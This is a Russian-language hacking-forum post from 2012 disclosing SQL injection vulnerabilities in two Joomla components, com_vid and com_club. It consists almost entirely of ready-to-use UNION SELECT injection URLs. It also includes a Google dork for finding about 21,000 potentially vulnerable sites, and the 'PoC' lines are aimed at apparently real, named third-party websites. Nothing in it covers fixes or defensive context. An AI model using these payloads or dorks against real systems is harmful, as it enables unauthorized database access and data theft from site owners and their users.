16.01.2012, 18:57
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Joomla "com_vid" component SQL Injection
Уязвим параметр id, что позволяет провести SQL-injection.
Эксплyатация:
Код:
http://site.ltd/index.php?option=com_vid&Itemid=60§ion=video&id_catigor=1&id=-1+union+select+1,2,version(),database(),5,6,7--+f
PoC:
Код:
http://sasha-shmel.ru/index.php?option=com_vid&Itemid=60§ion=video&id_catigor=1&id=-1+union+select+1,2,version(),database(),5,6,7--+f
---
Joomla "com_club" component SQL Injection
Уязвим параметр clubid, что позволяет провести SQL-injection.
Dork:
Код:
inurl:"?option=com_club"
Результатов: примерно 21 000, страница 4 (0,30 сек.)
Эксплyатация:
Код:
http://site.ltd/index.php?option=com_club&task=detail&clubid=-70002+union+select+version(),database(),3,4,5,6,7,8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--+f
PoC:
Код:
http://vbl.badmintonliga.be/index.php?option=com_club&task=detail&clubid=-70002+union+select+version(),database(),3,4,5,6,7,8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--+f
© Ereee
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Древовидный вид